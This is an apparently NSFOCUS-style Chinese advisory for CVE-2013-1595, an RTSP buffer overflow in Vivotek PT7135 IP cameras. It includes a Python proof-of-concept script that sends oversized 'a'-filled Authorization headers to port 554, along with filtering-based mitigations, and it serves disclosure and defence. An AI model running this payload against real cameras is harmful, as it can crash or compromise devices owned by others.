发布日期:2013-04-30
更新日期:2013-05-02
受影响系统:
Vivotek PT7135 IP camera 0400a
Vivotek PT7135 IP camera 0300a
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59573
CVE(CAN) ID: CVE-2013-1595
Vivotek是网络视频解决方案提供商。
Vivotek IP网络摄像头存在远程缓冲区溢出漏洞,通过向RTSP服务发送特制的报文,报文头字段Authorization完全用字符a (0x61)填充,攻击者可用0x61616161覆盖IP寄存器。
<*来源:Francisco Falcon
Nahuel Riva
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip, session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 除非需要,不要将摄像机联网。
* 如果可能,过滤RTSP流(默认端口554)。
* 在HTTP请求中,至少有一个代理过滤 /../../ 、getparam.cgi
* 对 farseer.out 的每个请求,过滤参数 system.ntp 内的字符串。
厂商补丁:
Vivotek
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: